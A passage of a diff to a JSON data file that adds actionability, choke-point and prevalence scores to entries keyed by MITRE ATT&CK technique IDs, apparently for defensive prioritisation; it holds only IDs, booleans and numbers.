         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.2142857142857143,
+        "choke_point_score": 0.2,
+        "prevalence_score": 0.00270913
     },
     {
         "tid": "T1135",
@@ -6939,7 +7149,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.10476190476190475,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00265113
     },
     {
         "tid": "T1136",
@@ -7122,7 +7335,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.419047619047619,
+        "choke_point_score": 0.25,
+        "prevalence_score": 0.00029615
     },
     {
         "tid": "T1137",
@@ -7337,7 +7553,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.2857142857142857,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00456953
     },
     {
         "tid": "T1140",
@@ -7374,7 +7593,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.10476190476190475,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.36307678
     },
     {
         "tid": "T1176",
@@ -7469,7 +7691,10 @@
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.22380952380952382,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00054999
     },
     {
         "tid": "T1185",
@@ -7540,7 +7765,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.20476190476190478,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00401915
     },
     {
         "tid": "T1187",
@@ -7611,7 +7839,10 @@
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.20476190476190478,
+        "choke_point_score": 0.15000000000000002,
+        "prevalence_score": 0
     },
     {
         "tid": "T1189",
@@ -7708,7 +7939,10 @@
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.32380952380952377,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.0006346
     },
     {
         "tid": "T1190",
@@ -7839,7 +8073,10 @@
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.9809523809523809,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00224226
     },
     {
         "tid": "T1195",
@@ -7967,7 +8204,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": true
+        "hardware_coverage": true,
+        "actionability_score": 0.24761904761904766,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00401915
     },
     {
         "tid": "T1197",
@@ -8053,7 +8293,10 @@
         "network_coverage": true,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.3857142857142857,
+        "choke_point_score": 0.25,
+        "prevalence_score": 0.04992977
     },
     {
         "tid": "T1199",
@@ -8121,7 +8364,10 @@
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.14761904761904762,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1200",
@@ -8182,7 +8428,10 @@
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": true
+        "hardware_coverage": true,
+        "actionability_score": 0.15714285714285714,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00571594
     },
     {
         "tid": "T1201",
@@ -8233,7 +8482,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.10952380952380952,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00111904
     },
     {
         "tid": "T1202",
@@ -8267,7 +8519,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.15238095238095237,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.01815086
     },
     {
         "tid": "T1203",
@@ -8329,7 +8584,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.28095238095238095,
+        "choke_point_score": 0.3,
+        "prevalence_score": 0.00706866
     },
     {
         "tid": "T1204",
@@ -8520,7 +8778,10 @@
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": true,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.3619047619047619,
+        "choke_point_score": 0.4,
+        "prevalence_score": 0.54990659
     },
     {
         "tid": "T1205",
@@ -8604,7 +8865,10 @@
         "network_coverage": true,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.12380952380952381,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1207",
@@ -8640,7 +8904,10 @@
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.0047619047619047615,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1210",
@@ -8787,7 +9054,10 @@
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.580952380952381,
+        "choke_point_score": 0.15000000000000002,
+        "prevalence_score": 0
     },
     {
         "tid": "T1211",
@@ -8878,7 +9148,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.3142857142857143,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.02745711
     },
     {
         "tid": "T1212",
@@ -8970,7 +9243,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.35714285714285715,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1213",
@@ -9158,7 +9434,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.3761904761904762,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1216",
@@ -9231,7 +9510,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.15238095238095237,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00604168
     },
     {
         "tid": "T1217",
@@ -9268,7 +9550,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.014285714285714284,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1218",
@@ -9634,7 +9919,10 @@
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.780952380952381,
+        "choke_point_score": 0.1,
+        "prevalence_score": 1
     },
     {
         "tid": "T1219",
@@ -9716,7 +10004,10 @@
         "network_coverage": true,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.38095238095238093,
+        "choke_point_score": 0.55,
+        "prevalence_score": 0.00469327
     },
     {
         "tid": "T1220",
@@ -9767,7 +10058,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.1142857142857143,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.0214707
     },
     {
         "tid": "T1221",
@@ -9854,7 +10148,10 @@
         "network_coverage": true,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.24285714285714288,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1222",
@@ -9969,7 +10266,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.2523809523809524,
+        "choke_point_score": 0.35,
+        "prevalence_score": 0.00096863
     },
     {
         "tid": "T1480",
@@ -10028,7 +10328,9 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1482",
@@ -10097,7 +10399,10 @@
         "network_coverage": true,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.29523809523809524,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.08870884
     },
     {
         "tid": "T1484",
@@ -10216,7 +10521,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.2571428571428571,
+        "choke_point_score": 0.55,
+        "prevalence_score": 0
     },
     {
         "tid": "T1485",
@@ -10284,7 +10592,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": true,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.319047619047619,
+        "choke_point_score": 0.05,
+        "prevalence_score": 0.0000423067961740376
     },
     {
         "tid": "T1486",
@@ -10356,7 +10667,10 @@
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": true,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.23809523809523808,
+        "choke_point_score": 0.05,
+        "prevalence_score": 0.01368903
     },
     {
         "tid": "T1489",
@@ -10447,7 +10761,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.3476190476190476,
+        "choke_point_score": 0.05,
+        "prevalence_score": 0.19533198
     },
     {
         "tid": "T1490",
@@ -10521,7 +10838,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.37142857142857144,
+        "choke_point_score": 0.2,
+        "prevalence_score": 0.0517985
     },
     {
         "tid": "T1491",
@@ -10615,7 +10935,10 @@
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.15238095238095237,
+        "choke_point_score": 0.05,
+        "prevalence_score": 0
     },
     {
         "tid": "T1495",
@@ -10698,7 +11021,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": true
+        "hardware_coverage": true,
+        "actionability_score": 0.2619047619047619,
+        "choke_point_score": 0.05,
+        "prevalence_score": 0
     },
     {
         "tid": "T1496",
@@ -10740,7 +11066,10 @@
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": true
+        "hardware_coverage": true,
+        "actionability_score": 0.023809523809523808,
+        "choke_point_score": 0.05,
+        "prevalence_score": 0.00029615
     },
     {
         "tid": "T1497",
@@ -10803,7 +11132,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.009523809523809523,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.3330587
     },
     {
         "tid": "T1498",
@@ -10894,7 +11226,10 @@
         "network_coverage": true,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": true
+        "hardware_coverage": true,
+        "actionability_score": 0.12380952380952381,
+        "choke_point_score": 0.05,
+        "prevalence_score": 0
     },
     {
         "tid": "T1499",
@@ -11020,7 +11355,10 @@
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": true
+        "hardware_coverage": true,
+        "actionability_score": 0.12857142857142856,
+        "choke_point_score": 0.05,
+        "prevalence_score": 0
     },
     {
         "tid": "T1505",
@@ -11234,7 +11572,10 @@
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.3523809523809524,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00992082
     },
     {
         "tid": "T1518",
@@ -11287,7 +11628,10 @@
         "network_coverage": true,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.023809523809523808,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.0388719
     },
     {
         "tid": "T1525",
@@ -11368,7 +11712,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": true,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.24285714285714288,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00012692
     },
     {
         "tid": "T1526",
@@ -11406,7 +11753,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": true,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.047619047619047616,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1528",
@@ -11501,7 +11851,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.3666666666666667,
+        "choke_point_score": 0.25,
+        "prevalence_score": 0
     },
     {
         "tid": "T1529",
@@ -11538,7 +11891,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": true
+        "hardware_coverage": true,
+        "actionability_score": 0.04285714285714285,
+        "choke_point_score": 0.05,
+        "prevalence_score": 0
     },
     {
         "tid": "T1530",
@@ -11662,7 +12018,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": true,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.5476190476190477,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1531",
@@ -11699,7 +12058,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.07619047619047618,
+        "choke_point_score": 0.05,
+        "prevalence_score": 0
     },
     {
         "tid": "T1534",
@@ -11739,7 +12101,9 @@
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "choke_point_score": 0.30000000000000004,
+        "prevalence_score": 0
     },
     {
         "tid": "T1535",
@@ -11785,7 +12149,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": true,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.0761904761904762,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1537",
@@ -11871,7 +12238,10 @@
         "network_coverage": true,
         "file_coverage": false,
         "cloud_coverage": true,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.33333333333333326,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1538",
@@ -11930,7 +12300,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.12380952380952381,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1539",
@@ -12008,7 +12381,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.19523809523809524,
+        "choke_point_score": 0.25,
+        "prevalence_score": 0
     },
     {
         "tid": "T1542",
@@ -12232,7 +12608,10 @@
         "network_coverage": true,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": true
+        "hardware_coverage": true,
+        "actionability_score": 0.319047619047619,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00067691
     },
     {
         "tid": "T1543",
@@ -12420,7 +12799,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": true
+        "hardware_coverage": true,
+        "actionability_score": 0.5666666666666667,
+        "choke_point_score": 0.2,
+        "prevalence_score": 1
     },
     {
         "tid": "T1546",
@@ -12725,7 +13107,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": true,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.22380952380952382,
+        "choke_point_score": 0.2,
+        "prevalence_score": 0.24164573
     },
     {
         "tid": "T1547",
@@ -13034,7 +13419,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": true
+        "hardware_coverage": true,
+        "actionability_score": 0.22857142857142856,
+        "choke_point_score": 0.44999999999999996,
+        "prevalence_score": 0.31083108
     },
     {
         "tid": "T1548",
@@ -13238,7 +13626,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.33333333333333337,
+        "choke_point_score": 0.35,
+        "prevalence_score": 0.62304979
     },
     {
         "tid": "T1550",
@@ -13417,7 +13808,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.1619047619047619,
+        "choke_point_score": 0.15000000000000002,
+        "prevalence_score": 0
     },
     {
         "tid": "T1552",
@@ -13770,7 +14164,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.6095238095238096,
+        "choke_point_score": 0.35,
+        "prevalence_score": 0.10949453
     },
     {
         "tid": "T1553",
@@ -13977,7 +14374,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.24285714285714288,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.03940008
     },
     {
         "tid": "T1554",
@@ -14035,7 +14435,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.18571428571428572,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1555",
@@ -14168,7 +14571,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.06190476190476191,
+        "choke_point_score": 0.25,
+        "prevalence_score": 0.20047604
     },
     {
         "tid": "T1556",
@@ -14361,7 +14767,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.29523809523809524,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1557",
@@ -14569,7 +14978,10 @@
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.46190476190476193,
+        "choke_point_score": 0.3,
+        "prevalence_score": 0.01029676
     },
     {
         "tid": "T1558",
@@ -14768,7 +15180,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.3,
+        "choke_point_score": 0.25,
+        "prevalence_score": 0.00491824
     },
     {
         "tid": "T1559",
@@ -14918,7 +15333,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.2761904761904762,
+        "choke_point_score": 0.3,
+        "prevalence_score": 0.01561121
     },
     {
         "tid": "T1560",
@@ -15008,7 +15426,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.20476190476190476,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.37974036
     },
     {
         "tid": "T1561",
@@ -15102,7 +15523,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": true
+        "hardware_coverage": true,
+        "actionability_score": 0.14761904761904762,
+        "choke_point_score": 0.05,
+        "prevalence_score": 0.03180408
     },
     {
         "tid": "T1562",
@@ -15405,7 +15829,10 @@
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": true,
-        "hardware_coverage": true
+        "hardware_coverage": true,
+        "actionability_score": 0.7047619047619047,
+        "choke_point_score": 0.1,
+        "prevalence_score": 1
     },
     {
         "tid": "T1563",
@@ -15593,7 +16020,10 @@
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.3523809523809524,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00021153
     },
     {
         "tid": "T1564",
@@ -15769,7 +16199,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": true
+        "hardware_coverage": true,
+        "actionability_score": 0.07142857142857142,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.69861754
     },
     {
         "tid": "T1565",
@@ -15943,7 +16376,10 @@
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.4285714285714286,
+        "choke_point_score": 0.05,
+        "prevalence_score": 0.0006346
     },
     {
         "tid": "T1566",
@@ -16132,7 +16568,10 @@
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.46190476190476193,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.02842361
     },
     {
         "tid": "T1567",
@@ -16236,7 +16675,10 @@
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.20476190476190478,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1568",
@@ -16337,7 +16779,10 @@
         "network_coverage": true,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.10476190476190478,
+        "choke_point_score": 0.15000000000000002,
+        "prevalence_score": 0
     },
     {
         "tid": "T1569",
@@ -16466,7 +16911,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.20476190476190478,
+        "choke_point_score": 0.2,
+        "prevalence_score": 0.66633245
     },
     {
         "tid": "T1570",
@@ -16544,7 +16992,10 @@
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.21904761904761905,
+        "choke_point_score": 0.5,
+        "prevalence_score": 0.00012692
     },
     {
         "tid": "T1571",
@@ -16610,7 +17061,10 @@
         "network_coverage": true,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.22857142857142856,
+        "choke_point_score": 0.25,
+        "prevalence_score": 0.07951844
     },
     {
         "tid": "T1572",
@@ -16680,7 +17134,10 @@
         "network_coverage": true,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.20476190476190476,
+        "choke_point_score": 0.2,
+        "prevalence_score": 0.00071922
     },
     {
         "tid": "T1573",
@@ -16780,7 +17237,10 @@
         "network_coverage": true,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.12380952380952381,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00046016
     },
     {
         "tid": "T1574",
@@ -17178,7 +17638,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.47619047619047616,
+        "choke_point_score": 0.35,
+        "prevalence_score": 1
     },
     {
         "tid": "T1578",
@@ -17327,7 +17790,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": true,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.18095238095238098,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1580",
@@ -17388,7 +17854,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": true,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.11428571428571428,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1583",
@@ -17523,7 +17992,9 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "choke_point_score": 0.05,
+        "prevalence_score": 0
     },
     {
         "tid": "T1584",
@@ -17658,7 +18129,9 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "choke_point_score": 0.05,
+        "prevalence_score": 0.00401915
     },
     {
         "tid": "T1585",
@@ -17730,7 +18203,9 @@
         "network_coverage": true,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "choke_point_score": 0.05,
+        "prevalence_score": 0
     },
     {
         "tid": "T1586",
@@ -17802,7 +18277,9 @@
         "network_coverage": true,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "choke_point_score": 0.05,
+        "prevalence_score": 0
     },
     {
         "tid": "T1587",
@@ -17905,7 +18382,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.047619047619047616,
+        "choke_point_score": 0.05,
+        "prevalence_score": 0
     },
     {
         "tid": "T1588",
@@ -18039,7 +18519,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.0047619047619047615,
+        "choke_point_score": 0.05,
+        "prevalence_score": 0
     },
     {
         "tid": "T1589",
@@ -18123,7 +18606,10 @@
         "network_coverage": true,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.0047619047619047615,
+        "choke_point_score": 0.05,
+        "prevalence_score": 0
     },
     {
         "tid": "T1590",
@@ -18255,7 +18741,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.01904761904761905,
+        "choke_point_score": 0.05,
+        "prevalence_score": 0
     },
     {
         "tid": "T1591",
@@ -18354,7 +18843,9 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "choke_point_score": 0.05,
+        "prevalence_score": 0
     },
     {
         "tid": "T1592",
@@ -18455,7 +18946,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.0047619047619047615,
+        "choke_point_score": 0.05,
+        "prevalence_score": 0
     },
     {
         "tid": "T1593",
@@ -18524,7 +19018,9 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "choke_point_score": 0.05,
+        "prevalence_score": 0
     },
     {
         "tid": "T1594",
@@ -18564,7 +19060,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.0047619047619047615,
+        "choke_point_score": 0.05,
+        "prevalence_score": 0
     },
     {
         "tid": "T1595",
@@ -18639,7 +19138,10 @@
         "network_coverage": true,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.01904761904761905,
+        "choke_point_score": 0.05,
+        "prevalence_score": 0
     },
     {
         "tid": "T1596",
@@ -18753,7 +19255,9 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "choke_point_score": 0.05,
+        "prevalence_score": 0
     },
     {
         "tid": "T1597",
@@ -18822,7 +19326,9 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
